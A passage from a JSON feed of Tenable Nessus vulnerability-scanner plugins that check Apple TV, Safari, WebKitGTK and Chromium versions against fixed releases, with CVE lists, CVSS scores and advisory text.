script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"15L211\";\ntvos_ver = '11';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:44", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.1. It is, therefore, affected by multiple vulnerabilities as described in the HT208695 security advisory.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-03T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 11.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4102", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4116", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4130", "CVE-2018-4133", "CVE-2018-4137", "CVE-2018-4145", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4186", "CVE-2018-4207", "CVE-2018-4208", "CVE-2018-4209", "CVE-2018-4210", "CVE-2018-4212", "CVE-2018-4213"], "modified": "2019-07-03T00:00:00", "cpe": ["cpe:/a:apple:safari", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SAFARI11_1_0.NASL", "href": "https://www.tenable.com/plugins/nessus/108805", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108805);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/07/03 12:01:40\");\n\n script_cve_id(\n \"CVE-2018-4101\",\n \"CVE-2018-4102\",\n \"CVE-2018-4113\",\n \"CVE-2018-4114\",\n \"CVE-2018-4116\",\n \"CVE-2018-4117\",\n \"CVE-2018-4118\",\n \"CVE-2018-4119\",\n \"CVE-2018-4120\",\n \"CVE-2018-4121\",\n \"CVE-2018-4122\",\n \"CVE-2018-4125\",\n \"CVE-2018-4127\",\n \"CVE-2018-4128\",\n \"CVE-2018-4129\",\n \"CVE-2018-4130\",\n \"CVE-2018-4133\",\n \"CVE-2018-4137\",\n \"CVE-2018-4145\",\n \"CVE-2018-4146\",\n \"CVE-2018-4161\",\n \"CVE-2018-4162\",\n \"CVE-2018-4163\",\n \"CVE-2018-4165\",\n \"CVE-2018-4186\",\n \"CVE-2018-4207\",\n \"CVE-2018-4208\",\n \"CVE-2018-4209\",\n \"CVE-2018-4210\",\n \"CVE-2018-4212\",\n \"CVE-2018-4213\"\n );\n script_bugtraq_id(103580, 104887);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-3-29-6\");\n\n script_name(english:\"macOS : Apple Safari < 11.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 11.1. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208695 security advisory.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208695\");\n # https://lists.apple.com/archives/security-announce/2018/Mar/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0a2c7175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 11.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4101\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_apple_safari_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item('Host/MacOSX/Version');\nif (!os) audit(AUDIT_OS_NOT, 'Mac OS X or macOS');\n\nif (!preg(pattern:\"Mac OS X 10\\.(11|12|13)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, 'Mac OS X El Capitan 10.11 / macOS Sierra 10.12 / macOS High Sierra 10.13');\n\nget_kb_item_or_exit('MacOSX/Safari/Installed', exit_code:0);\npath = get_kb_item_or_exit('MacOSX/Safari/Path', exit_code:1);\nversion = get_kb_item_or_exit('MacOSX/Safari/Version', exit_code:1);\n\nfixed_version = '11.1';\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', fixed_version\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Safari', version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:36:48", "description": "Versions of Apple TV earlier than 10.2.1 are affected by multiple vulnerabilities :\n\n - A flaw exists that is triggered as certain input is not properly validated. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code.\n - A use-after-free error exists in the handling of RenderLayer objects. With a specially crafted web page, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code.\n - A logic flaw exists that allows a universal cross-site scripting (UXSS) attack. The issue is triggered when handling WebKit Editor commands. This may allow a context-dependent attacker to create a specially crafted web page that will execute arbitrary script code in a user's browser session within the trust relationship between their browser and any website. \n\nThis product is also affected by vulnerabilities found in the following components:\n\n - AVEVideoEncoder\n - CoreAudio\n - CoreFoundation\n - Foundation\n - IOSurface\n - Kernel\n - SQLite\n - TextInput\n - WebKit\n - Web Inspector", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-18T00:00:00", "type": "nessus", "title": "Apple TV < 10.2.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2499", "CVE-2017-2501", "CVE-2017-2502", "CVE-2017-2504", "CVE-2017-2505", "CVE-2017-2507", "CVE-2017-2513", "CVE-2017-2515", "CVE-2017-2518", "CVE-2017-2519", "CVE-2017-2520", "CVE-2017-2521", "CVE-2017-2524", "CVE-2017-2525", "CVE-2017-2530", "CVE-2017-2531", "CVE-2017-2536", "CVE-2017-2549", "CVE-2017-6979", "CVE-2017-6980", "CVE-2017-6984", "CVE-2017-6987", "CVE-2017-6989", "CVE-2017-6994", "CVE-2017-6995", "CVE-2017-6996", "CVE-2017-6997", "CVE-2017-6998", "CVE-2017-6999", "CVE-2017-2522", "CVE-2017-2523"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:apple_tv:*:*:*:*:*:*:*:*"], "id": "700118.PRM", "href": "https://www.tenable.com/plugins/nnm/700118", "sourceData": "Binary data 700118.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:48:53", "description": "The WebKitGTK project reports many vulnerabilities, including several arbitrary code execution vulnerabilities.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-07-08T00:00:00", "type": "nessus", "title": "FreeBSD : webkit2-gtk3 -- Multiple vulnerabilities (3dd46e05-9fb0-11e9-bf65-00012e582166)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6201", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623"], "modified": "2022-05-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:webkit2-gtk3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3DD46E059FB011E9BF6500012E582166.NASL", "href": "https://www.tenable.com/plugins/nessus/126519", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126519);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6201\", \"CVE-2019-6237\", \"CVE-2019-6251\", \"CVE-2019-7285\", \"CVE-2019-7292\", \"CVE-2019-8503\", \"CVE-2019-8506\", \"CVE-2019-8515\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\", \"CVE-2019-8571\", \"CVE-2019-8583\", \"CVE-2019-8584\", \"CVE-2019-8586\", \"CVE-2019-8587\", \"CVE-2019-8594\", \"CVE-2019-8595\", \"CVE-2019-8596\", \"CVE-2019-8597\", \"CVE-2019-8601\", \"CVE-2019-8607\", \"CVE-2019-8608\", \"CVE-2019-8609\", \"CVE-2019-8610\", \"CVE-2019-8611\", \"CVE-2019-8615\", \"CVE-2019-8619\", \"CVE-2019-8622\", \"CVE-2019-8623\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"FreeBSD : webkit2-gtk3 -- Multiple vulnerabilities (3dd46e05-9fb0-11e9-bf65-00012e582166)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The WebKitGTK project reports many vulnerabilities, including several\narbitrary code execution vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0003.html\"\n );\n # https://vuxml.freebsd.org/freebsd/3dd46e05-9fb0-11e9-bf65-00012e582166.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bbb210b0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8544\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3<2.24.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T18:55:30", "description": "The remote host is affected by the vulnerability described in GLSA-201811-10 (Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the referenced CVE identifiers and Google Chrome Releases for details.\n Impact :\n\n A remote attacker could execute arbitrary code, escalate privileges, cause a heap buffer overflow, obtain sensitive information, or spoof a URL.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-11-26T00:00:00", "type": "nessus", "title": "GLSA-201811-10 : Chromium: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-16065", "CVE-2018-16066", "CVE-2018-16067", "CVE-2018-16068", "CVE-2018-16069", "CVE-2018-16070", "CVE-2018-16071", "CVE-2018-16072", "CVE-2018-16073", "CVE-2018-16074", "CVE-2018-16075", "CVE-2018-16076", "CVE-2018-16077", "CVE-2018-16078", "CVE-2018-16079", "CVE-2018-16080", "CVE-2018-16081", "CVE-2018-16082", "CVE-2018-16083", "CVE-2018-16084", "CVE-2018-16085", "CVE-2018-16086", "CVE-2018-16087", "CVE-2018-16088", "CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-09T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201811-10.NASL", "href": "https://www.tenable.com/plugins/nessus/119130", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201811-10.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119130);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/09\");\n\n script_cve_id(\"CVE-2018-16065\", \"CVE-2018-16066\", \"CVE-2018-16067\", \"CVE-2018-16068\", \"CVE-2018-16069\", \"CVE-2018-16070\", \"CVE-2018-16071\", \"CVE-2018-16072\", \"CVE-2018-16073\", \"CVE-2018-16074\", \"CVE-2018-16075\", \"CVE-2018-16076\", \"CVE-2018-16077\", \"CVE-2018-16078\", \"CVE-2018-16079\", \"CVE-2018-16080\", \"CVE-2018-16081\", \"CVE-2018-16082\", \"CVE-2018-16083\", \"CVE-2018-16084\", \"CVE-2018-16085\", \"CVE-2018-16086\", \"CVE-2018-16087\", \"CVE-2018-16088\", \"CVE-2018-17462\", \"CVE-2018-17463\", \"CVE-2018-17464\", \"CVE-2018-17465\", \"CVE-2018-17466\", \"CVE-2018-17467\", \"CVE-2018-17468\", \"CVE-2018-17469\", \"CVE-2018-17470\", \"CVE-2018-17471\", \"CVE-2018-17472\", \"CVE-2018-17473\", \"CVE-2018-17474\", \"CVE-2018-17475\", \"CVE-2018-17476\", \"CVE-2018-17477\", \"CVE-2018-5179\");\n script_xref(name:\"GLSA\", value:\"201811-10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"GLSA-201811-10 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201811-10\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code, escalate privileges,\n cause a heap buffer overflow, obtain sensitive information, or spoof a\n URL.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201811-10\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-70.0.3538.67'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 70.0.3538.67\"), vulnerable:make_list(\"lt 70.0.3538.67\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:55:25", "description": "The remote host is affected by the vulnerability described in GLSA-201909-05 (WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebkitGTK+. Please review the CVE identifiers referenced below for details.\n Impact :\n\n An attacker, by enticing a user to visit maliciously crafted web content, may be able to execute arbitrary code or cause memory corruption.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-09-09T00:00:00", "type": "nessus", "title": "GLSA-201909-05 : WebkitGTK+: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6201", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8595", "CVE-2019-8607", "CVE-2019-8615", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690"], "modified": "2022-05-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201909-05.NASL", "href": "https://www.tenable.com/plugins/nessus/128594", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201909-05.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128594);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6201\", \"CVE-2019-6251\", \"CVE-2019-7285\", \"CVE-2019-7292\", \"CVE-2019-8503\", \"CVE-2019-8506\", \"CVE-2019-8515\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\", \"CVE-2019-8595\", \"CVE-2019-8607\", \"CVE-2019-8615\", \"CVE-2019-8644\", \"CVE-2019-8649\", \"CVE-2019-8658\", \"CVE-2019-8666\", \"CVE-2019-8669\", \"CVE-2019-8671\", \"CVE-2019-8672\", \"CVE-2019-8673\", \"CVE-2019-8676\", \"CVE-2019-8677\", \"CVE-2019-8678\", \"CVE-2019-8679\", \"CVE-2019-8680\", \"CVE-2019-8681\", \"CVE-2019-8683\", \"CVE-2019-8684\", \"CVE-2019-8686\", \"CVE-2019-8687\", \"CVE-2019-8688\", \"CVE-2019-8689\", \"CVE-2019-8690\");\n script_xref(name:\"GLSA\", value:\"201909-05\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"GLSA-201909-05 : WebkitGTK+: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201909-05\n(WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebkitGTK+. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n An attacker, by enticing a user to visit maliciously crafted web\n content, may be able to execute arbitrary code or cause memory\n corruption.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0002.html\"\n );\n 